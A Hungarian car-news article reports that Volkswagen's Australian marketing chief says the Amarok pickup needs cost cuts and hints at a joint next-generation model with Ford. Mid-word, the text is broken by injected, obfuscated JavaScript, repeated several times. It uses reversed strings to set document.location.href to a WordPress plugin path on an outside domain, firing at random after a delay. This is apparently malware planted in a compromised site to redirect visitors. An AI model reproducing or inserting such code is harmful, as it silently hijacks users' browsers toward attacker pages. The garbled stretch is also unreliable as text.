Egy ausztrál autós szaklapnak, a GoAutónak nyilatkozva a Volkswagen-csoport helyi marketingigazgatója, Michael Bartsch elárulta, hogy jelentős költségcsökkentésre szorul az Amarok. A pickupot jelenleg a cég németoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tországi és argentínai üzemei gyártják, és sem az előbbinél érvényesülő magas munkabérek, sem a dél-amerikai ország instabil devizája nem kedvez a versenyképességnek. Bartsch szerint megoldást jelenthetne, ha az új generációs modellt közösen fejlesztenék egy másik gyártóval – mondjuk a Forddal. „Minden eshetőséget mérlegelünk, minden út nyitva áll. Nem volnék őszinte, ha azt mondanám, nincs köztünk semmi a Forddal, de nem vagyok abban a helyzetben, hogy bármit kommentáljak.” Arra mindenesetre ügyelnie kell a két gyártónak, hogy…
- Hirdetés -